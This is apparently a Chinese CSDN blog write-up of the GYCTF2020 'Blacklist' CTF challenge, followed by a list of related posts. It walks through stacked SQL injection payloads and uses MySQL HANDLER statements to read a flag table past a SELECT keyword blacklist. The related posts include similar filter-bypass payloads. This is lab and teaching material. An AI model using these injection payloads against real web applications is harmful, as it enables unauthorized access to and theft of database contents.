sql注入限制关键字(SELECT)使用HANDLER查询 [GYCTF2020]Blacklist

于 2023-02-12 21:17:39 发布
阅读量200 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alatan9/article/details/128999739
版权
文章介绍了在解决GYCTF2020的Blacklist问题时,如何通过字符型注入判断和MySQL的HANDLER命令来遍历数据库,获取数据。通过HANDLER打开并读取数据表,从而避免了黑名单的限制。这种方法特别适用于存在特定数据库操作限制的情况。
摘要由CSDN通过智能技术生成

依据实例理解

[GYCTF2020]Blacklist

打开环境后是这样 

提交1出现数据

 输入2/1判断注入类型

回显为2,可以判断为字符型注入

输入select,查看是否存在回显:

爆出黑名单

没有show可以尝试堆叠注入

输入1';show databases;#

 1';show tables;查看表名

关键 

查询flag表结构1';desc FlagHere;

	HANDLER table_name OPEN [ [AS] a]
 
HANDLER table_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER table_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER table_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
 
HANDLER tbl_name CLOSE

通过HANDLER table_name OPEN打开一张表,无返回结果,
通过HANDLER table_name READ FIRST获取数据表第一行,通过将 READ FIRST改成READ NEXT依次获取其它行。有点类似于指针。
通过HANDLER table_name CLOSE来关闭打开的表。

通过索引去查看的话可以按照一定的顺序,获取表中的数据。
通过HANDLER table_name READ index_name FIRST,获取句柄第一行(索引最小的一行),NEXT获取下一行,PREV获取前一行,LAST获取最后一行(索引最大的一行)。

通过索引列指定一个值,可以指定从哪一行开始。
通过HANDLER table_name READ index_name = value,指定从哪一行开始,通过NEXT继续浏览。

使用handler查询

1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;#

找到flag说明handler可用  但是仍需要注意此命令只能用于mysql数据库

 如果有对信息安全感兴趣的可以私聊我领取学习资料

alatan9
关注
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2772
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方行不通,看别人的wp中提到了`Handler`3、Handler 1、考点 1、堆叠注入 2、 Handler 心得:学会新的姿势Handlersql查询 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 315
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
mysql的特定查询语句handler
m0_51607644的博客
02-22 608
1、说明 handler语句不具备select语句的所有功能。handler是mysql专用的语句,没有包含到SQL标准中。它每次只能查询1次记录,而select可以根据需要返回多条查询结果。资料上说它可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。 2、handler HANDLER table_name OPEN [ [AS] a] HANDLER table_name READ index_name { = | <= | >= | < | > } (v
select SQL注入
aloneBUThappy的博客
12-20 3605
select SQL注入
sql 注入 handler命令
20岁爱吃必胜客
03-15 1087
HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…) [ WHERE where_condition ] [LIMIT … ] HANDLER tbl_name READ index_name { FIRST...
mysql查询语句-handler
qq_44927883的博客
12-02 517
1 简介 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。 HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。 2 基本语 handler语句的语如下: HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ inde
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 834
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
Web_SQL注入(1)
Lemon's blog
07-15 623
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网杯的题目一样,但之前的方比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
SQL注入类型CTF题目总结
Lelouch_E的博客
11-25 1571
SQL注入类型CTF题union 注入buu Fakebookbuu Baby Sqli盲注buu Hack World报错注入buu hardsql其他buu BlackList union 注入 buu Fakebook 注册后扫描目录发现:/robots.txt 测试发现/view.php?no=1 参数存在SQL注入,但是union select被waf拦截了 尝试绕过 爆表名 /view.php?no=-1 union/**/select 1,group_concat(table_name),
【愚公系列】2023年05月 攻防世界-Web(supersqli)
热门推荐
时光隧道
01-24 3万+
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。
HardFault_Handler问题查找方
eydwyz的专栏
05-24 2112
收藏 评论(0) 分享到 微博 QQ 微信 LinkedIn STM32出现HardFault_Handler故障的原因主要有两个方面: 1、内存溢出或者访问越界。这个需要自己写程序的时候规范代码,遇到了需要慢慢排查。 2、堆栈溢出。增加堆栈的大小。   出现问题时排查的方: 发生异常之后可首先查看LR寄存器中的值,确定当前使用堆栈为M
sql注入用<>绕过被过滤的select ——百度杯9月第二场SQL
ancan8807的博客
09-17 1万+
题目提示SQL注入,打开源代码发现<!--SELECT * FROM info WHERE id=1--> 尝试union select 1,2,3提示inj code! 经过多次尝试之后发现select已经被过滤,于是百度绕过select过滤的方,/*!%53eLEct*/,发现依旧无绕过select过滤 经过再次尝试后发现可以用<>进行绕过,于是构造...
sql select 抛异常_mysql数据库sql注入
weixin_39646021的博客
12-12 312
mysql数据库sql注入学习sql注入原理可以帮助我们写代码的时候避免一些不必要的漏洞,禁止用于违用途。mysql -u root -p回车后数据密码(默认root)进入数据库,没有配置环境变量的需要在mysql目录下的bin文件夹里面打开终端执行show databases;查看数据库CREATE DATABASE IF NOT EXISTS Hacktest DEFAULT C...
SQL注入绕过select过滤
qq_43596950的博客
03-25 4748
原题目出自攻防世界收录的2019强网杯,官网已有writer up,此博文仅个人的做题笔记 原题目链接:adworld.xctf.org.cn select被过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
SQL注入过滤限制绕过方
weixin_30879169的博客
04-28 1247
突然想我们是否可以用什么方绕过SQL注入限制呢?到网上考察了一下,提到的方大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete ...
sql注入原理
嘻嘻哈哈
02-23 2891
0x01sql注入原理 sql注入漏洞产生的原理是因为服务器对用户输入参数过滤不严格,将含有恶意代码的参数代入数据库查询语句中并执行。 0x02sql注入中常用的函数与语 Group_concat():将select查询结果全部显示出来,占一个显示位 select version():查询MySQL版本 select user():查询数据库用户名 select databas...
sql注入过滤select_网站SQL注入渗透测试手介绍
weixin_39628384的博客
11-26 2024
国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方,这期仍有很多客户找到我们想要了解针对于SQL注入攻击的测试方,这一期我们来讲解下注入的攻击分类和使用,让客户明白漏洞是如何产生的,会给网站安全带来怎样的影响!3.1 SQL注入漏洞3.1.1. 注入分类SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得...
sql注入-越权访问数据
qq_27536045的博客
06-12 605
表结构如下
什么是SQL注入使用Mybatis时,如何防止SQL注入
最新发布
06-09
4. 使用Mybatis提供的过滤器:Mybatis提供了TypeHandler和Plugin两种过滤器,可以对参数进行转义和拦截,避免了SQL注入的风险。 总之,防止SQL注入是非常重要的,Mybatis提供了多种防止SQL注入的方式,开发人员可以...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值